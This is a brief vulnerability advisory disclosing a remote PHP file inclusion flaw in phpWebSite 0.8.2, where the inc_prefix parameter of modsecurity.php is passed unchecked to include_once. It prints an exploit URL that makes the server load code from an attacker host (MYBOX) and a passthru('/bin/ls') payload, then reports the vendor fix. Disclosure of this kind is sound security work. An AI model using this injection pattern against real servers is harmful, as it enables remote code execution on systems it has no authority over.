PHP source injection in phpWebSite

["Tim Vandermeersch" <Tim.Vandermeersch () pandora be>]

--------------------------------------
| PHP source injection in phpWebSite |
--------------------------------------
 
Product Description
=================== 
phpWebSite is written in the PHP Programming Language, 
making it ideal for developers to write customized 
plug-ins. PHP is a server side programming language 
that is simple, cross-platform, and fast. It can be 
found at http://phpwebsite.appstate.edu
 
Tested version
==============
Stable - 0.8.2 (modsecurity.php version < 1.10)

The Problem
=========== 
phpWebSite commes with a file called 
modsecurity.php, and looks like this:
 
-------- modsecurity.php --------
<?php
 global $inc_prefix;
 if(!$inc_prefix) {
 ...
 }
 ...
 include_once($inc_prefix."htmlheader.php");
?>
----------------------------------
 
If someone request a URL like 
http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, 
the htmlheader.php file from MYBOX would be included,
and the attacker would be able to include any code he 
wants.
 
Examples
======== 
http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
 
--- htmlheader.php ---
<? passthru("/bin/ls") ?>
----------------------

Output: dir listing of the current dierctory

Sollution
=========
I informed the vendor and they released a new version (1.11) 
of the modsecurity.php file wich is avaiable from:
http://res1.stddev.appstate.edu/horde/chora/cvs.php/phpwebsite

A new version (0.8.3) is released so this vulnerability so new users will
never have a modsecurity.php file older then version 1.11

------------------------------
Tim Vandermeersch
Tim.Vandermeersch () pandora be
http://users.pandora.be/tim/